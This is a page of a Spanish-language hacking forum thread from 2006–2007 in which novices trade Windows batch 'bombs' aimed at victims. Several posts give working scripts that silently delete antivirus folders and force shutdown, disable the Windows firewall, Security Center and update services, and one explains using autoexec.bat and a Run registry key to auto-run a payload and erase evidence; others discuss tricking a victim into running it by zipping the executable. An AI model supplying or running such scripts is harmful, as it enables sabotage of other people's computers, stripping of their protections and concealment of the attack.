Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 02:58:31
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Intrusión con Bat y Troyano Detectable!!! 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 3 4 [5] Ir Abajo Imprimir
Autor Tema: Intrusión con Bat y Troyano Detectable!!!  (Leído 15933 veces)
otoelpiloto
Visitante
« Respuesta #100 en: Febrero 02, 2006, 10:19:57 »

hola soy nuevo en esto y en este foro, y ante todo queria daros las gracias por la paciencia que teneis con los que no sabemos,

yo queria haceros una pregunta para que me digais que estoy haciendo mal, he creado un archivo bat asi:

@echo off
cd\
cd archivos de programa
del /Q/S/F norton antivirus
del /Q/S/F panda titanium
del /Q/S/F kaspersky
shutdown -s -t 1 -f

bueno yo habia creado 3 carpetas en archivos de programa una norton antivirus otra panda titanium y otra kaspersky y las 3 tenian datos dentro, pues ejecute esto y solo se me borro los del kaspersky.

podriais decirme que he hecho mal ?? gracias de antemano
geob234
Habitual
Desconectado Desconectado

Ver Perfil
« Respuesta #101 en: Febrero 05, 2006, 05:57:57 »

pues yo hise uno a partir de pruevas, para eliminar carpetas y archivos, como lo que aparecen en respuestas anteriores; pero al provarlo me empeso a borrar todo lo que tenia ademas de eso lo pude parar,
este es el fuente que utilise:

@echo off
cd\
cd archivos de programa
cd prueba         
del *.* /Q /F /S     
cd.. del prueba     
del prueba           
exit   

se supone que solo me iba a borrar la carpeta prueva,
creia que no se iba a ver cuando se borrara algo, aun asi muchas gracias por la info ya que el solo ver que funciona y es muy bueno a pesar de que uno mismo se esta tirando todo se siente agradable conocer y aprender algo nuevo; espero sus respuestas y muchas gracias
DionWarZ
Visitante
« Respuesta #102 en: Febrero 09, 2006, 11:26:23 »

Hola chicos, es mi primer post en esta comunidad, y la verdad que esta buenisíma, las explicaciones son muy claras, y eso se agradece.

La verdad es que antes de opinar e leído muchas cosas dentro del foro, algo así para culturizarme y manejar los conceptos básicos de este foro. Para no ser la típica persona que llega preguntando sin conocimientos.

Bueno después de leeer, quiero que me aclareen algo, hablaban sobre infectar el archivo .bat con el troyano resurrection, la verdad es que no entiendo como se hace eso, como se deben juntar los archivos, para infectar con dicho troyano ?

Por último no me queda claro lo siguiente:

@echo off
cd\
cd archivos de programa
cd prueba         
del *.* /Q /F /S   

Este comando elimina la carpeta para siempre ?
« Última modificación: Julio 10, 2008, 01:36:58 por ManCuerTex (ViPeR) » En línea
liquik
Colaborador

Ver Perfil
« Respuesta #103 en: Febrero 09, 2006, 03:02:13 »

DionWarZ n se trata d infectar un archivo .bat , .bat puede ser lo q tu kieras y puedes hacerlo inofensivo o maligno. Si kieres infectar un archivo oculta un troyan en un archivo cualquiera. Y ese bat n hace nada mira en el foro los bat q han hecho muxos para matar el firewall y antivirus

salu2

liquik
Mohameditox
Recien Llegado
*

Ver Perfil
« Respuesta #104 en: Febrero 19, 2006, 01:20:21 »

yo seguire insistiendo hasta que akguien me conteste. ¿porque narices la "victima" tiene que aceptar?!!!

no se puede hacer nada para obligarla a que acepte? es decir, sin preguntar de ninguna manera puedes acceder a su pc?

entendisteis?

obligarla a que acepte el bat y lo ejecute. eso ves, tendria merito para mi. gracias gracias gracias

un saludo

Buenas! Especifica en tu pregunta. Te refieres a que al ejecutarle el .bet no pregunte nada?
Epecifica tambien tu sistema operativo porque los codigos para Win9x/2000 no son los mismos que para Windos XP. Si especificas mas podriamos ayudarte.
 Wink
« Última modificación: Julio 10, 2008, 01:37:13 por ManCuerTex (ViPeR) » En línea

Mohameditox
Recien Llegado
*

Ver Perfil
« Respuesta #105 en: Febrero 19, 2006, 01:23:03 »

tenog una duda, estas bombas bat son lo mejor de lo mejor.
pongo lo que dises al principio en un bloc lo guardo .bat pero cuando lo ejecuto no pasa nada que puede ser ?
o me dise que no puede encontrar la ruta especifica  Huh

ayuda plisss

Cual es el codigo que pones en el bat?
« Última modificación: Julio 10, 2008, 01:37:26 por ManCuerTex (ViPeR) » En línea

Mohameditox
Recien Llegado
*

Ver Perfil
« Respuesta #106 en: Febrero 19, 2006, 01:53:39 »

Por último no me queda claro lo siguiente:

@echo off
cd\
cd archivos de programa
cd prueba         
del *.* /Q /F /S   

Este comando elimina la carpeta para siempre ?
Bueno con respecto a los bat son archivos en los cuales tu enlistas comandos, y cuando ejecutas ese archivo se efectuan los comandos.
Si el bat lo guardaras en Escritorio el codigo te quedaria asi:

@echo off
cd..
cd..
cd "archivos de programa"
del /Q/S/F

/Q Es un modificador para que no pida ninguna confirmacion de eliminar al usuario, que no salga el mensaje ("¿Desea eliminar archivos?")
/S Fuerza la eliminacion de todos los archivos de los subdirectorios

Ahi estan las explicaciones de los comandos. Gracias a Viper.
Ojala esto responda a tu pregunta.
Lo que es yo, tampoco se ocupar un troyano ni nada de eso. Ahora recien estoy leyendo acerca de los Bats.
Porfavor si mi respuesta es errónea corríjanla.
salu2
 Wink
« Última modificación: Julio 10, 2008, 01:37:41 por ManCuerTex (ViPeR) » En línea

vanackx
Miembro

danger with noobs

Ver Perfil
« Respuesta #107 en: ſeptiembre 09, 2006, 05:37:12 »

pos yo tengo un problem "investigando el bat se me ejecuto y me jodio el norton keria saber komo puedo arreglarlo .

lo malo es k tengo el norton en una carpeta Y KIERA DESINSTALAR EL REVENTAO PERO.. NO ME DEJA KITARLO(CREO K TENGO UN TROYANO JODIENDOME)Y NOO SE K ACER

K AGO ME BAJO OTRO ANTIVIRUS Y ANALIZO LA M DEL NORTON CASCAO O INTENTO ARREGLARLO?Huh?

HELP  :'(

Lawsuit87
Recien Llegado
*

Ver Perfil
« Respuesta #108 en: ſeptiembre 10, 2006, 09:37:18 »

SOY NUEVO EN EL TEMA, QUISIERA Q ME RESPONDIERAN UNA PREGUNTA:
HAY ALGUNA FORMA PARA QUE MEDIANTE EL ARCHIVO .BAT NO SE PERMITA LA EJECUCIÓN DEL ANTIVIRUS O FIREWALL DE LA VICTIMA SIN NECESIDAD DE BORRARSELOS DEL SISTEMA? O LA UNICA FORMA ES BORRANDOLOS? SI SE PUEDE SIN TENER QUE BORRARLOS QUISIERA UN EJM DEL CODIGO FUENTE........

GRACIAS
SALUDOS Wink Cheesy
« Última modificación: ſeptiembre 10, 2006, 10:08:31 por Lawsuit87 » En línea
vanackx
Miembro

danger with noobs

Ver Perfil
« Respuesta #109 en: ſeptiembre 12, 2006, 05:38:31 »

ya lo arregle ya tengo el nod 32 es muy buenoy me va de perlas

felcolar
Recien Llegado
*

Ver Perfil
« Respuesta #110 en: Octubre 03, 2006, 12:40:02 »

gucerni
Recien Llegado
*

Ver Perfil Email
« Respuesta #111 en: Octubre 21, 2006, 05:32:40 »

-The Nax-
Recien Llegado
*

Ver Perfil
« Respuesta #112 en: Diciembre 20, 2006, 03:51:20 »

Neo_InSaNe
Recien Llegado
*

Ver Perfil
« Respuesta #113 en: Enero 07, 2007, 01:51:00 »

JAjajaja.. hise... un bat.. y al ejecutarlo.. me borro los accesos directos mi escritorio.. y un archivo de texto... los puedo recuperar... o los abra movido a algun lado.. luego les cuento q se me ocurrio algo con ese bat.. y luego me dicen.. si se puede.... Afro
dlink
Recien Llegado
*

Ver Perfil
« Respuesta #114 en: Marzo 25, 2007, 09:16:36 »

Hola, soy nuevo en esto... bueno, ya tengo el archivo .bat transformado en .exe, y a partir de aqui... que hay que hacer con el? se lo enviamos a la persona a la que queremos desactivarle los antivirus simplemente? Hay algun modo de que no se note que le mandas un ejecutable??
Loukhacks
Habitual

.:.:.

Ver Perfil
« Respuesta #115 en: Abril 29, 2007, 01:41:09 »

Hola, soy nuevo en esto... bueno, ya tengo el archivo .bat transformado en .exe, y a partir de aqui... que hay que hacer con el? se lo enviamos a la persona a la que queremos desactivarle los antivirus simplemente? Hay algun modo de que no se note que le mandas un ejecutable??
Enviandoselo comprimido en .zip

Red-T
Miembro

Ver Perfil
« Respuesta #116 en: Mayo 23, 2007, 03:27:08 »

que tal quisiera hacer una pregunta

cuando con el bat eliminamos el antivirus una ves que la computadora se reinicie el antivirus correra sin cumplir sus funciones es decir .... si tenemos panda ... saldra la pantalla con la fotito de panda y todo lo normal con la unica diferencia de que no cumplira sus funciones y estara ahi sin hacer nada por que si fuera asi la victima pensaria que aun tiene su antivirus y seria grandioso pensaria que sigue protegida gracias y disculpen la ignorancia recien me inicio en programacion

darknessfeatsunny
Visitante
« Respuesta #117 en: Mayo 23, 2007, 04:59:43 »

que tal quisiera hacer una pregunta

cuando con el bat eliminamos el antivirus una ves que la computadora se reinicie el antivirus correra sin cumplir sus funciones es decir .... si tenemos panda ... saldra la pantalla con la fotito de panda y todo lo normal con la unica diferencia de que no cumplira sus funciones y estara ahi sin hacer nada por que si fuera asi la victima pensaria que aun tiene su antivirus y seria grandioso pensaria que sigue protegida gracias y disculpen la ignorancia recien me inicio en programacion

No, de hecho, si eliminas el antirvirus borrandolo, lo mas seguro que al reiniciar salte un mensaje de error diciendo que los ficheros de dicho programa estan corruptos (si no se elimino por completo). si se elimino por completo no saldra nada, el antivirus no aparecera....

Un saludo
xpertvision
Recien Llegado
*

Ver Perfil
« Respuesta #118 en: Mayo 29, 2007, 11:55:13 »

this will never work !

the antivirus have many files in REG FILE

when you boot on pc , you will get many error messages , and maybe some part of antivirus still work

the only bat files you can do is to  disable windows firewall and Security Center

KILL Security Center AND FIREWALL.BAT

@echo off
netsh firewall set opmode disable
sc stop SharedAccess
sc config SharedAccess start= disabled
sc stop wuauserv
sc config SharedAccess start= disabled
sc stop wscsvc
sc config wscsvc start= disabled

for antivirus is impossible
« Última modificación: Mayo 29, 2007, 11:56:26 por xpertvision » En línea
ElMagoOscuro
Recien Llegado
*

dreese17@hotmail.com
Ver Perfil
« Respuesta #119 en: Junio 15, 2007, 02:00:42 »

En realidad llevo ya algo de tiempo en esto pero hasta hoy no lo manejo bien jajajaja por lo que veo hay mucha gente que no conoce los comandos del DOS... Un bat es un archivo de ejecucion de comandos por lotes, lo que quiere decir es que va ejecutando los comandos que le damos como si los estuvieramos escribiendo y ejecutando uno a uno en el modo consola. siempre ponemos  @ECHO OFF al principio somplemente para que no aparezcan los comandos que estamos dando sino simplemente sus resultados... (aun no se como hacer que no aparezca ni siquiera el resultado pa que nadie lo note jajajajaja)... y los comandos son comandos sencillos que podemos utilizar casi siempre en el modo consola... a excepcion de algunos como son el IF ELSE ENDIF y otros por el estilo...

Bueno, dicho esto espero haber ayudado a alguien  Grin

Ahora bien alguien podria decirme si de alguna forma puedo hacer que el comando rd /s /q funcione correctamente en el windows 98... puesto que las variantes /s /q no estan incluidos en los comandos de la  version de windows 98... Existe alguna forma de migrarlo del XP? jejeje
ElMagoOscuro
Recien Llegado
*

dreese17@hotmail.com
Ver Perfil
« Respuesta #120 en: Junio 25, 2007, 05:38:24 »

Para que no se vea el codigo fuente puedes convertirlo en un archivo .bat o .exe, esto se explica en el post

http://foro.el-hacker.com/index.php/topic,18689.msg80557.html#msg80557

Ahora si lo que quieres es eliminar la carpeta completa existe el metodo sencillo que yo siempre utilizo

rd [nombre de la carpeta]  /s /q /f /a

para eliminar la carpeta completa con los archivos de sistema y sin preguntar nada y en modo silencioso sin mostrar lo que en verdad esta haciendo jejeje

esto es si utliza windows xp
en el windows XP al igual que en sus versiones anteriores existe el archivo autoexec.bat en la unidad c: pero a diferencia de sus versiones anteriores en esta no se ejecuta al principio por defecto asi que lo que podrias hacer seria un exe que te meta el codigo alli incluyendo el comando para eliminar tu archivo bat o exe (de acuerdo a cual utilices) y luego insertas el autoexec.bat al registro en la ruta

HKLM/Software/Microsoft/Windows/CurrentVersion/Run/autoexec.bat

asi arrancara el autoexec.bat al inicio y te eliminara el archivo que creaste luego de haber reiniciado la maquina y haber eliminado lo que quisieras eliminando evidencias jejeje Afro

y si quieres vuelves a vaciar el autoexec con el comando sencillo "echo > c:\autoexec.bat" sin las comillas asi ya ni quedaran indicios de que alguna vez alla hecho algo Grin

y bueno, el comando rd funciona en el windows98 solo si la carpeta esta vacia ya que todos los modificadores que te di como el /s /q no funcionan en el windows98... y no encuentro aun la forma de hacer que funcionen jejeje

Bueno, en algo almenos espero haberte ayudado
oscuro12
Recien Llegado
*

Ver Perfil
« Respuesta #121 en: Noviembre 15, 2007, 09:22:14 »

bueno un saludo a todos espero que andes bien xD

aca es apra ver si este .bat estaria bien para entrar a otra secion del pc

@ ech off
cd\---------------------ya etsaria en la undidad c:\
cd "nombre de la otra seccion"  sera para borrar algo que no sea en la mia xD
del /Q /S "nombre de la carpeta"---- la que quiero borrar de esa persona
exit

bueno la verdad no se que tal mal me quedo pero pues es solo una idea que tenia ganas de poner a discucion y pues si me puede colaborar a resolver mi duda se les agradece mucho

y otra que tengo es sobre si un .bat puede atacar un red algo parecido a la de un cafe internet haciendo que el intermediario sea un com,putar para que llegue al servidor (espero no estar erroneo en mi vacabulario xD) y pues esa seria mas o menos mis dudas si me las pueden ayduar se los agradeseria mucho

Nota: soy super newbie  Afro

Páginas: 1 2 3 4 [5] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Intrusión con Bat y Troyano Detectable!!! « anterior próximo »
Ir a:  

Ranking-Hits